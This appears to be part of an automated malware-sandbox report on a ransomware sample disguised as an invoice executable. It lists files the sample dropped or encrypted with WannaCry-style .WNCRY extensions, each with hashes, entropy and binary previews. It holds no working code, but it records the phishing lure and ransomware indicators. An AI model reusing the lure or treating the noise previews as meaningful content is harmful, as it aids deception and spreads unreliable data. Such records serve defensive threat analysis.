                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844868078231559
                                                          Encrypted:false
                                                          SSDEEP:24:bkMMzlVxsr0+TJr5rJZWFG/TzvOTQkOIA4IT6wt5RzoO3cSlzFp1hqTUNW:bkHxDszTJr0DTZZIT6ehDp87
                                                          MD5:53F4D0846D513B6529FC9138FB359B23
                                                          SHA1:8058880E6DFB7A8BFFE3B3637E5D882A92FF3EB6
                                                          SHA-256:77CBA7BDE7D34A5B4F2D9C70464C843B0611A9855AD8FF0FEE17FF42272E046A
                                                          SHA-512:75EF50B2E457CE698A48606DF2F9391C2CDB8442D1B37D82E0E3763AAE8F3E3569D80EE84491BDCB485AA808F40023BC01FAB380D8A90F03630F91177A546136
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....0...K..n!'M..3...:..}.>..g.#..K..`.h.fLc..RKe9......F.9<.@.@......-Yg8o.@.urQ.tg....&....KP"_.H|G..(..._.".Q5...E..d}.o4.4p...Y...1.U.#.......OS...jo|t.....Eo...EeC...I.#.R.I._.M.9^...........<..-k...s_LDD.".mK5..;".5.w.....+,.:...WDqy7..j&. (z............<.z.....!5.......]._....=Y.XLV-i.J.`..o...!.5R9..... .... '.n._ .Ry|e0.k.jQ..i.,....n.g.A#.T...H1U.L..FKC..Jgy...'.p..e*.F.9rg.E.!...i......u...o..(|.....v}..T23e..6O....2......n.fD.d.....1...4D.,*k..]..;..c.x ..[<.....|.M .7J....S3.......s....,..FN~...!Z..,q.(...k....-.."..p.......oNT8-$...A(Qi.....h..A...;....zg..F.s...a....Sn..T...<...|...u..j..g .>....<.......l...h....C..\2~.Y..q^.X..q......K&.val..CB.T1..~....`.8..c...;....._0....p.S.........L(.. .s.._Q.0f.?.....Jh...x....Q4.C..$....O&Z..<V.t..sr_......1...i.........S....n[.....Z..x@....#...q,...P..%9.&.'.g.nP....O..<...;..:......6BbM~....jN.?..f;.J.8.... ..pA....yr.".d.Q.....,[....l..BO........h.c....#..4nLJ.i..(.........9.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\QFAPOWPAFG.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.832827341428288
                                                          Encrypted:false
                                                          SSDEEP:24:LcB6+1heTLyluXDqj8+6BRERf7VUiwEqa669monhywqEz:YK+j8vRnXEqaNbqEz
                                                          MD5:22C5A33A6BA983F132372BE3E55C3B26
                                                          SHA1:DF22B1B6D4541DD85954FECEC9EA0B83E74447DD
                                                          SHA-256:078E3F647D6BEC1E1329DC9C494D4FCE13E603DE522DF2321C05ED31FB7DB564
                                                          SHA-512:1ACB06345AC8333DC0E59B11A11AF47C9313CF7138F992E1C2743DD53ADB6A7FE537E5BF75F5D37BBD16391D08765ACAFC2E8EB2AE5837F655F2AA9391B87C5E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:~...L.L..5.oVM:..k:.:D.J..p.Q.....y.U...D..,.......{.....{.v.f?...^.......GO.........mq....a.....n..:bk.9#.z..k..Q.-.E..A.)42i.=.+.~....1.?-.r"l...?.-...x.....Y..:..C/...i;.....BmV.4W.q.(.........F...r.s.D.9V...g$I...s..M.O."._.y.FJ.ff..;%..!(..<"..zK.0*q.-...&.B#.....V.(}....[wYM.l:..2N...OQ.,.%.F.<..;..W.Z..VV.q2$.;p.48,7.1.2Iy"..V.....4....xR....TE...Z....'=%...8W........q..Bt..Q0o8.Y...U..q....0.OF|.<..t.$..c......z6K>..e........{V<.`J.[.6.:d.)...v0..S.H{w..p.)......2E._....}.CW.J....25/y.>.k).....S(.M...R.r.i.Fv...:IMK....,.<.Nn.AFBl.pT#5n.....3\.s.c.p..>/.......T..-......E.(A.-...*."..d....e9JJ.f..6q...\K....N..H....0.h.w.E.x....S...E........)..x...N.........SF'...4...P).M/V..Dh../.V5...9+.Z...h..&>.....[.t._rz5....%S+....X.U.\./K^....nY.p...^..!A......PK..0...RW. ....|8cI.h+..t..^Z6.w...1......!]......Id.5.....'N..p.h....Y5...">...A. ...v.u.N.W.....c.&9..Z .....C..........u.!...G......rT*..%.......W5.........i.....M

                                                          C:\Users\user\Desktop\LIJDSFKJZG\QFAPOWPAFG.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8354128405562475
                                                          Encrypted:false
                                                          SSDEEP:24:bkUZtbYd5bTOJ5hisue1Hw1yLhBiB8999isHLdatHCrVEa4vuSqD6AM9g+h4dC:bkIw5X07yUok5993rdatHCJEJ/jd
                                                          MD5:5385B3F8039DAF3D353B1EB4AFD3DF75
                                                          SHA1:9131EAA564735D6B51B3290C3AD3BA6559A27D30
                                                          SHA-256:8F19F7008D89C86A834B06DD77BC12B5A2BC9A6124CCE0E335C2AD4AB0B279DE
                                                          SHA-512:B13D6D65455550DDBF7F36FBA8292B802E30A4E583E574C40897231FCC54C17F284CF20134234EBC8C1FF2A008A5596F0E8E3486C7611ED2F8ED30FE29E6EB25
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....bR.H..[.i.X..Z....y.......s..a.....F($#s...._`...u8O...l.Z...v.|...V..Me.f4{.>.D.HPr....R8..";. +.+-Q>... .AE...-.+..P[.n...kq..s...C(..".O.C.ZO......R....WQ...2q.....#Xgy.M..r.Od.{G<n>!7...#..i.{f.X.....fg.o..........o.....l.1T..i.s....'+................I..|.\.?.e...>4.I.w.5.lc.o.\..W.c.Z*h....u.u...|....sLG.*..RF;....D.G......Dw..by..T..o...oI..r.......b...m..u...6...l..A.fo~U..]5..._..p..!A....Z...t0...]..:..Yc........W.r.=..>....G.s.^....~...=V...Ai.-.............+....].q.3ze<.....2..R...".B.g.E.<....f.9.og..M....rhn....s`oPV.......b.g...."!...++P...5...>j.3...Rw..v....o..~..~..0u.QvN=.:3.w..^F...E........I+fELjbv......7........I...q...d1#o<..1.....g]W.(y..l.W..!.-U.1.j......,m...%...L@.'..4.G...3V...e.B.]q.p|..B..B.`M/]...E...G.8.\...P.6............`#,.$I#. C...d.......9.....0.0.....4......:d...O{K...hF?.c.q...+....}"0B..4.....}j.i.....C........}/.0.....lg8".mS<...|q...3...t\..Rl.rZ.u+5Y.h....J....Z*...?).....7.........

                                                          C:\Users\user\Desktop\LIJDSFKJZG\QFAPOWPAFG.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8354128405562475
                                                          Encrypted:false
                                                          SSDEEP:24:bkUZtbYd5bTOJ5hisue1Hw1yLhBiB8999isHLdatHCrVEa4vuSqD6AM9g+h4dC:bkIw5X07yUok5993rdatHCJEJ/jd
                                                          MD5:5385B3F8039DAF3D353B1EB4AFD3DF75
                                                          SHA1:9131EAA564735D6B51B3290C3AD3BA6559A27D30
                                                          SHA-256:8F19F7008D89C86A834B06DD77BC12B5A2BC9A6124CCE0E335C2AD4AB0B279DE
                                                          SHA-512:B13D6D65455550DDBF7F36FBA8292B802E30A4E583E574C40897231FCC54C17F284CF20134234EBC8C1FF2A008A5596F0E8E3486C7611ED2F8ED30FE29E6EB25
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....bR.H..[.i.X..Z....y.......s..a.....F($#s...._`...u8O...l.Z...v.|...V..Me.f4{.>.D.HPr....R8..";. +.+-Q>... .AE...-.+..P[.n...kq..s...C(..".O.C.ZO......R....WQ...2q.....#Xgy.M..r.Od.{G<n>!7...#..i.{f.X.....fg.o..........o.....l.1T..i.s....'+................I..|.\.?.e...>4.I.w.5.lc.o.\..W.c.Z*h....u.u...|....sLG.*..RF;....D.G......Dw..by..T..o...oI..r.......b...m..u...6...l..A.fo~U..]5..._..p..!A....Z...t0...]..:..Yc........W.r.=..>....G.s.^....~...=V...Ai.-.............+....].q.3ze<.....2..R...".B.g.E.<....f.9.og..M....rhn....s`oPV.......b.g...."!...++P...5...>j.3...Rw..v....o..~..~..0u.QvN=.:3.w..^F...E........I+fELjbv......7........I...q...d1#o<..1.....g]W.(y..l.W..!.-U.1.j......,m...%...L@.'..4.G...3V...e.B.]q.p|..B..B.`M/]...E...G.8.\...P.6............`#,.$I#. C...d.......9.....0.0.....4......:d...O{K...hF?.c.q...+....}"0B..4.....}j.i.....C........}/.0.....lg8".mS<...|q...3...t\..Rl.rZ.u+5Y.h....J....Z*...?).....7.........

                                                          C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800170893089835
                                                          Encrypted:false
                                                          SSDEEP:24:81Q8sVkZB5Vz5pCHarB1HfwkOnARJYAacvcebw3y4:4865VzrCKokOn/AacU+gy4
                                                          MD5:2C3442A044ED4AA75DC7924D86A37B75
                                                          SHA1:2A6BBF1213535BED1A8E986472BA262B571C7363
                                                          SHA-256:084D86FFB46B1E141D373F3BFF0892AA8A748E6E4A8EA05A513075B7D17DE86A
                                                          SHA-512:2D1024D0D5EA482764F30B9F52D3A570A455FA3C2D779FD0A1F84DF18EE3F193742302919E539C3F3D39E3F0FE6D1A6B35CBA43D47716D24E7DC5ABD98885646
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..Y#.U.rX.8....02.,....$...2......j...J..+....I..iF..uR.....g,../...{...yu..s. ..m..e.[..e....:.~{w"....d.....223.O/.......(g.Z_..]...*B..T.]....:.t...fg.S.e1&..*.y.5.${.m.......cj.n...A.v%..B.9..'^-...M.,...n.8.n.8...MN..........^..m.E....;.....#....~.....ju..#.|)x3v.@...[..=zY....n.C#E.1.62.b.S_.....-/..8X....W.v.G..pB.O7..iB8..w._..y? ..b....,..w..]Im.[.<.'`.Z*j...#J.. .z] .z-.^.]K...Pq...n......2e.6.u...\z6..*\t.B.^^%........)+q.F9..*I]d..sS..A........[".lls.=......P......o,.<.N_,..(...8M....0n#UZ..B.48^8.&g.^..>1..-.)..N...W.s}..#../..}..f. ..k.l.g.....Q..`.[..)...~4T./...3FoK.......e....5.y.).;.)c............j.+....g.u...u!t..U..6.;...[%U.8N..8.].}......G....-.t.OF..t2G..esB....%...u.....*...i..UE.d.fi.V.K.~......Ys...O;*.sE.L.g-...y..+.`..^...o....S.p..Q.R'...+.Ar..A.ji8.....!........]$iKo..d,...x.... .6.c.i...#.R....O.o...M..p..Q..}........\...g...CX.G..o...{.Ap..HcQ...6..............7..H.h.u<.4i(.\..Po.....[..~..H

                                                          C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8515949690114635
                                                          Encrypted:false
                                                          SSDEEP:24:bk/wHdrsu2A46cPANtPO5vifjgqauOMh/jIPiX5cFtRtvqJML4BUfuIvLs286B5v:bk/w9rshbQvPOBYkqaKhbIPKKFtLqJ5Y
                                                          MD5:972D08CBBC609A6C47F32572BF14B070
                                                          SHA1:BE6284C7FD0FB9D79CD0FF0217B51EA890BDE47D
                                                          SHA-256:FC63B3FAAE76C4C6AEEFB4E1DC7B5276909BBF6A1EBAEA50D7F8E5219729F0B9
                                                          SHA-512:83C5E1597C711890327D1716DD9A8D501383A9546A36EF67FB5F7968742174DCEB16035275A748047E8B8205BEF3F38FFE3F1A807D3C23A6C63BCAF235151CB9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......M...Yf...N.[-.....Z...%.?.y$.i...|..:\....g.].S!...0v...+.9.b3...q.f3\={B..t>...E.r..s....?E..z..5&.A.6H..y..j=2.......2@.:.3.....fU...a.W.+..b*...:....Vq<.l7....P.!\w.R...'.....CSt.'.b..l y@..z...#'?..x..r.F.`.../V...1......Q7.'.=S&_..M..c.............x..@..s2R.0..~E..x..x.<~pw..^.k...*.|....g.. ...x.n..<....cE.(.c5.A.h..........p.%......xJt.?.g.T>....H.|..$.:<\.....O..I...j..(b>]p.N..V.ei..A...&.qo...'.....(.3....}5...)...L!...i.U>....sj.E..?.MV...?8...7Aj.n.L.y...u$g..72/9..P..E.j..`b.kU...+.....-IM}...8D.*r..n.h&...j2'.;..US.\..V.kU...`yD.q'n.L. ,.f...H4..,..Z...6...J...P....d.2.9_I~..^.g.....D.!.m..A..%m......o2.m..q6*|....V..$F.=............Ef..*b}D.r.S+...I.W ........F..X......p.).q..'n.)W..;#e.).WO.%........'w%l..[.K...}.......{....,S`:....G.D.e.g..~.... `r..b..,S.....PB.Xo..v..YC.M..6.#..o.......&....OAn.jBI...l*[)..7.R.>w......c=...|...}..=n.S...T...R...J\n...N...$nx..........[YF).GT...mK.U.o.!.f..;>...+3.JU.?.e.H

                                                          C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8515949690114635
                                                          Encrypted:false
                                                          SSDEEP:24:bk/wHdrsu2A46cPANtPO5vifjgqauOMh/jIPiX5cFtRtvqJML4BUfuIvLs286B5v:bk/w9rshbQvPOBYkqaKhbIPKKFtLqJ5Y
                                                          MD5:972D08CBBC609A6C47F32572BF14B070
                                                          SHA1:BE6284C7FD0FB9D79CD0FF0217B51EA890BDE47D
                                                          SHA-256:FC63B3FAAE76C4C6AEEFB4E1DC7B5276909BBF6A1EBAEA50D7F8E5219729F0B9
                                                          SHA-512:83C5E1597C711890327D1716DD9A8D501383A9546A36EF67FB5F7968742174DCEB16035275A748047E8B8205BEF3F38FFE3F1A807D3C23A6C63BCAF235151CB9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......M...Yf...N.[-.....Z...%.?.y$.i...|..:\....g.].S!...0v...+.9.b3...q.f3\={B..t>...E.r..s....?E..z..5&.A.6H..y..j=2.......2@.:.3.....fU...a.W.+..b*...:....Vq<.l7....P.!\w.R...'.....CSt.'.b..l y@..z...#'?..x..r.F.`.../V...1......Q7.'.=S&_..M..c.............x..@..s2R.0..~E..x..x.<~pw..^.k...*.|....g.. ...x.n..<....cE.(.c5.A.h..........p.%......xJt.?.g.T>....H.|..$.:<\.....O..I...j..(b>]p.N..V.ei..A...&.qo...'.....(.3....}5...)...L!...i.U>....sj.E..?.MV...?8...7Aj.n.L.y...u$g..72/9..P..E.j..`b.kU...+.....-IM}...8D.*r..n.h&...j2'.;..US.\..V.kU...`yD.q'n.L. ,.f...H4..,..Z...6...J...P....d.2.9_I~..^.g.....D.!.m..A..%m......o2.m..q6*|....V..$F.=............Ef..*b}D.r.S+...I.W ........F..X......p.).q..'n.)W..;#e.).WO.%........'w%l..[.K...}.......{....,S`:....G.D.e.g..~.... `r..b..,S.....PB.Xo..v..YC.M..6.#..o.......&....OAn.jBI...l*[)..7.R.>w......c=...|...}..=n.S...T...R...J\n...N...$nx..........[YF).GT...mK.U.o.!.f..;>...+3.JU.?.e.H

                                                          C:\Users\user\Desktop\LIJDSFKJZG\WSHEJMDVQC.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826689884175093
                                                          Encrypted:false
                                                          SSDEEP:24:RBCrT1s5KyOgAGnQq+6AdsNtQ+OXrZzfwzwhE4N9v2vQTiO01ymnYjvy+:nCKOTtqvAAt4hQw3N9vqi08/
                                                          MD5:FFBFA8DAF53DAC951942B5C6CAF2B4C0
                                                          SHA1:AA60CACA2F4C8C1930A568E90FB0335B65871AF0
                                                          SHA-256:A3DE99F7899D785533F74E70F868A19919EB778418B5686C3E9B6C2119E80607
                                                          SHA-512:454F45AE5F0CA8A322EACA0629EE21FE5FB2F15B41F77E5B611B99E730623C6CCCEC7438E6ABA3E512ABF00BAEFD3F91B8DD79D10B323E00C9CB89EA206AA987
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.G...2..]......`.4."..? ){........"(.....]..!."...7Fu..G..v.r.F...k..{@.0...!..i.F.S.....x.E.T.a..(..2.^.H.-e.w.W...#....9....b3X..J.....~.k.m..O.~/.|M....j.[d....U.>..1...m..Gz.|.k@..l).....g...r....:d.j..GR...xv.0v.DF..C...`..C5wJ7.....q5k...0...Q2...[...a.1b....+.....H.cI..cA.!.c.,.<.4..m.d....X.<.vS.g..-.).j..L.iW..m..;..f.WG....&.../_......{d.4?O... .....m0..../.h.>`.-..3..D...;p...(..Y..9.?.Q.@a.......T_p.]S...(...R ..$.e.#^.y..P..$a.FnN..0.-3.c#...E"....]....h..$.8t2.7...{s.`J.?I.......H...K..\C`=..0y:v.....L....#.1.d.$...~.P.8Y.T....YLM).X`.9..Nx..O.U....H...M.O.T.{.Y9K..uH.........i......N..8......Rkx.Y.}.......l/|.d.p.}..&GAFB...Aq....X^....^....WO|^...V"...l..a...c.VCk.'u..^M./\5jK...+...Mu C<&B..".O.d....`_.n...T.%..n.RT........M...@.8.y.\.!.$...$.;@.?u.c...p.E...E.....0..6?Mp..V.Z...HJ.f..f.....}..#.}....+..|.-6..ch...$..7.Yn.AB..'N....x)..-n.u.'...5.....A.3.zz..fJ.{..I/.y...z....R.p...<.v..V...1-..._C...K.X.>....'W..o..

                                                          C:\Users\user\Desktop\LIJDSFKJZG\WSHEJMDVQC.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.836252345240981
                                                          Encrypted:false
                                                          SSDEEP:24:bkEuMt7lUAa3X17/k8nd1whR7o/bQyooSUn9sdCmSqscFi0hRxqNdSaR8sOIp+WI:bkvMt2P17/k8d1whR8tSlCmHsco2ELSv
                                                          MD5:249CF9FE9D9E6F0CFB75D61287523546
                                                          SHA1:BDD8546230DA9DDE38FFF34EABCA0FD7759D8A0E
                                                          SHA-256:2A296D1EC5CD379857FE91327A8F0347D7E91C7FE9E6F703F2D1621853C75719
                                                          SHA-512:0B98BB8F49B51F6BB24D11DC6C5C2D299BB4CCD0FD45B51323F48C5BF95A4212DDD91E8FC2EC3ED90F207EF3CB89FE44990D7186F70629ECDBE7676A6C008D78
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......F..t60.../[Zy..Q...K...L$$.....Zp.<..e...2@..nY.{[..LT..Dez.:s...@.....uB.....o.'.`..].,D|qpx..<.!...Ly/)....%..=..O.7.....!H./....:q.&.c.6`.@Jz.>.&..5.fo'.OP?...B....... .......v.D.."x..w*..].aLZ%.G%.._.y8s.c......R1.)B87...eQ.;.pS.0........;,.............. S..W....)1....dm&U...q.z.#.r-l[w.....r.......r{.,..m8c....n.)...z.-go......A....7.........t..p9....:G.R ......I.+f..K. ....u..p.....Y..?....&X.u1`.cv=y^...,.....E...Q+.B..\....X.3 .....m$.>p...n-\Q...,....Oz...vap*t.\.......n....;..JK.G....<`.....:......Z..'h.%..L..E....P..x.F.Ix9c.W.H.}..H..Y......k..n...._..A.*$..Z.....\...E..\J......[........./.....l.S....|....l.TG.!.j1.1[...6g...u.}.....D..5b....g.-...a....s..N....Xx...%...O..:D.........J...R.!...)...\...8...$..E.f\I..Hz/Y...2.hv..^.RrU.DK^.f.].C.Q.b...*.kH..a...|I5B......^..e.E`.....+TZ}C.I....-.a.=.83=..m.o....<#E....._..XB.X......2.x-`...NK........_..f.6..L... ..;1o....W.`....{><.S...p(.GS...x..d.[T-..d..(Jk..ii.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\WSHEJMDVQC.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.836252345240981
                                                          Encrypted:false
                                                          SSDEEP:24:bkEuMt7lUAa3X17/k8nd1whR7o/bQyooSUn9sdCmSqscFi0hRxqNdSaR8sOIp+WI:bkvMt2P17/k8d1whR8tSlCmHsco2ELSv
                                                          MD5:249CF9FE9D9E6F0CFB75D61287523546
                                                          SHA1:BDD8546230DA9DDE38FFF34EABCA0FD7759D8A0E
                                                          SHA-256:2A296D1EC5CD379857FE91327A8F0347D7E91C7FE9E6F703F2D1621853C75719
                                                          SHA-512:0B98BB8F49B51F6BB24D11DC6C5C2D299BB4CCD0FD45B51323F48C5BF95A4212DDD91E8FC2EC3ED90F207EF3CB89FE44990D7186F70629ECDBE7676A6C008D78
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......F..t60.../[Zy..Q...K...L$$.....Zp.<..e...2@..nY.{[..LT..Dez.:s...@.....uB.....o.'.`..].,D|qpx..<.!...Ly/)....%..=..O.7.....!H./....:q.&.c.6`.@Jz.>.&..5.fo'.OP?...B....... .......v.D.."x..w*..].aLZ%.G%.._.y8s.c......R1.)B87...eQ.;.pS.0........;,.............. S..W....)1....dm&U...q.z.#.r-l[w.....r.......r{.,..m8c....n.)...z.-go......A....7.........t..p9....:G.R ......I.+f..K. ....u..p.....Y..?....&X.u1`.cv=y^...,.....E...Q+.B..\....X.3 .....m$.>p...n-\Q...,....Oz...vap*t.\.......n....;..JK.G....<`.....:......Z..'h.%..L..E....P..x.F.Ix9c.W.H.}..H..Y......k..n...._..A.*$..Z.....\...E..\J......[........./.....l.S....|....l.TG.!.j1.1[...6g...u.}.....D..5b....g.-...a....s..N....Xx...%...O..:D.........J...R.!...)...\...8...$..E.f\I..Hz/Y...2.hv..^.RrU.DK^.f.].C.Q.b...*.kH..a...|I5B......^..e.E`.....+TZ}C.I....-.a.=.83=..m.o....<#E....._..XB.X......2.x-`...NK........_..f.6..L... ..;1o....W.`....{><.S...p(.GS...x..d.[T-..d..(Jk..ii.

                                                          C:\Users\user\Desktop\NIRMEKAMZH.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.799256142770332
                                                          Encrypted:false
                                                          SSDEEP:24:0kWuY2ybj8Y3DOmGr1hUWQc6z80pFy5JAJ/B04dgcxbGNX:7Wd2ybgY39Gr1hVQc6z80rH5LmXX
                                                          MD5:D60D2F2C620165F621033B8BC6971117
                                                          SHA1:C60EF1D039A4CE047D1B1F9F6FC664B32C24E6EA
                                                          SHA-256:AE71F895DA3E7E44779B9EB73F5A7F204DDF6578D91D7032817E059EE581DACF
                                                          SHA-512:AFDB580D4B694EE6E5C60A2B623860F40BEA2F6FFDFBCE6D54F666A9A3BB702A1882DF434AB85280653EDE0943D3F4BDCB32FF554D38003314E0ABCA88E2DB70
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:._..R...Co.^..H...-......o..q...,#..<$.z.c..`F?..}O...U<.0qV.5....=.........#......j.0.. ..g4PE...)X..cMC8..E..9}.s .*o;...G...-.........Y|P..PG.....M8A_g.X..X.`.f........(..i7.....L.h. '._". .Z......P...l<.!..."..0_.T?C4../vjEH..`.I./5....b2Su....%..`.e...C.'..10~.1...b.t...l.<UT...!`L.9..c.K...0.X....i..52....3=....X.......2.#azDH..aV..4.mk(........JZ.W....@>.Z..Q...poH.3....e.5,.....As...].... ..$>...6; 9.,b.T.)..:u@.6Ym."..mm.W.....>.&B..I....]..o...h.%....g...L.1_...0. .....k.[^...n...q..>.,..x..........4[.....[-......w..r...Y.<S8........x9u.....[.h.bK....-..u.^.U1.H./k.g.j.d..S. ..VI......R.U.P.T.SIk.oA........v....8).!y....[...o...,.../..p.\.+..H4..K.....eI.....PQl, J.u.},.....>8.&/f.7..P.[..).j.#......7w.*4...V.R.K./..d."d]vZ-.cW............*.K....Y.....7...#;......cjH..#.!.-<....eF..`wmDV..h..M...Q..^j.....*2......=O.T)?.T.Qi...4.<.~.p.F....o`..IT.....'~..R*v.,.....,..^L.I.C.P.<VZ.4x~,.!.I...W. .!.~>.q.G4..|.X...0q7......0.x.;.

                                                          C:\Users\user\Desktop\NIRMEKAMZH.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.859521653126108
                                                          Encrypted:false
                                                          SSDEEP:24:bkcK3bCxklEGGCma2YAAChwJr/znmFMESg1AdSdPm2l2IDwOWjv7z/:bkcK3bxEGGF6ChwzcbZ9m2lzW7
                                                          MD5:D20003373C9A5ADE1DD6AA364F0FB2FC
                                                          SHA1:8FAE0663695213BA704DB8E43AE8377D6359467E
                                                          SHA-256:D21F5989EEF5D02091A2E6E0B6CEAD12CE3F27FB394C3CCB09BF4C9A0EFCBC8E
                                                          SHA-512:9A17DBEAA52210FD71884FF3923628E115B99EB6F921ACE7D32DA7DCDB718D9A41B4036C0FACC49CC16C5E3482CCCA2BC1B203E6CF0FB1F0B64357466BD88D47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....A.U..N).G..yf......E....cq....&....+.v.1E.-=._o..b'.....;.G}...x4.....)Z..,.#.T]II8+n.-_y..(f..| ....?.....%.dX..n}uy.SQ..y._e].i...Z..R..^{9|.!.5....n..PK....k.g.lr.....@R6.a?..5G..,....:.*.fRY.d.8.".G..sj.....-..~..O.*...Uv.._...1.....^.R..|.c...............&..@.p@.......kL@8.b~..r.3.."...l'..3.y.Y...d...D....f.-XZ.> ..".A.%U.Zc4Q.hj..es?..8.~.f.E...H@.f.*:...8..k.m......Py..p.e.3..cxHn.ADK.B..W_.....kj./Aq..R..\...;...;J&...9.O~...O..{|.F..MV.D.m..8<C..G...z.T.g..&l...f.....B....p:.k...H.g%.1.4\l...}...0..f.+N.~..4..J..li.Y.~.Kt.p.$.../n...V.dO.b<~.`[..6.w.k.+.7...S...p.iQD\r........e...!....ADU.1_.t.N.d{HOD...E..L.......c.B..p.......~.......C.."......Z..G...Q.....D.a..b51............J)B.IP@.....K....@.d..v.|....xF.qD.y.z2.I..|o.38._.K...{.....kXB....n;1|.....^.8.'}...*l...wI...cDd...a...[..W.'.....&..%..d...4...-....jt..q.wo9.9w,..:4Q.....S.".2.>..c..)..=..g..K..k.$..,.%. PB.U.!I.<...qw.).....Gu5...Y*?_....'........X.3.

                                                          C:\Users\user\Desktop\NIRMEKAMZH.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.859521653126108
                                                          Encrypted:false
                                                          SSDEEP:24:bkcK3bCxklEGGCma2YAAChwJr/znmFMESg1AdSdPm2l2IDwOWjv7z/:bkcK3bxEGGF6ChwzcbZ9m2lzW7
                                                          MD5:D20003373C9A5ADE1DD6AA364F0FB2FC
                                                          SHA1:8FAE0663695213BA704DB8E43AE8377D6359467E
                                                          SHA-256:D21F5989EEF5D02091A2E6E0B6CEAD12CE3F27FB394C3CCB09BF4C9A0EFCBC8E
                                                          SHA-512:9A17DBEAA52210FD71884FF3923628E115B99EB6F921ACE7D32DA7DCDB718D9A41B4036C0FACC49CC16C5E3482CCCA2BC1B203E6CF0FB1F0B64357466BD88D47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....A.U..N).G..yf......E....cq....&....+.v.1E.-=._o..b'.....;.G}...x4.....)Z..,.#.T]II8+n.-_y..(f..| ....?.....%.dX..n}uy.SQ..y._e].i...Z..R..^{9|.!.5....n..PK....k.g.lr.....@R6.a?..5G..,....:.*.fRY.d.8.".G..sj.....-..~..O.*...Uv.._...1.....^.R..|.c...............&..@.p@.......kL@8.b~..r.3.."...l'..3.y.Y...d...D....f.-XZ.> ..".A.%U.Zc4Q.hj..es?..8.~.f.E...H@.f.*:...8..k.m......Py..p.e.3..cxHn.ADK.B..W_.....kj./Aq..R..\...;...;J&...9.O~...O..{|.F..MV.D.m..8<C..G...z.T.g..&l...f.....B....p:.k...H.g%.1.4\l...}...0..f.+N.~..4..J..li.Y.~.Kt.p.$.../n...V.dO.b<~.`[..6.w.k.+.7...S...p.iQD\r........e...!....ADU.1_.t.N.d{HOD...E..L.......c.B..p.......~.......C.."......Z..G...Q.....D.a..b51............J)B.IP@.....K....@.d..v.|....xF.qD.y.z2.I..|o.38._.K...{.....kXB....n;1|.....^.8.'}...*l...wI...cDd...a...[..W.'.....&..%..d...4...-....jt..q.wo9.9w,..:4Q.....S.".2.>..c..)..=..g..K..k.$..,.%. PB.U.!I.<...qw.).....Gu5...Y*?_....'........X.3.

                                                          C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

                                                          Download File
